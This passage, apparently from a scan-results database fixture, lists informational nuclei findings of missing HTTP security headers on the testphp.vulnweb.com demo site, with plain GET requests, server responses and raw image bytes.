'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:48.277Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 713, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:41:48.433Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 714, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:41:48.601Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 715, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:41:48.753Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 716, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:41:48.903Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 717, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:41:49.064Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 718, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:41:49.217Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 719, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:41:49.369Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c 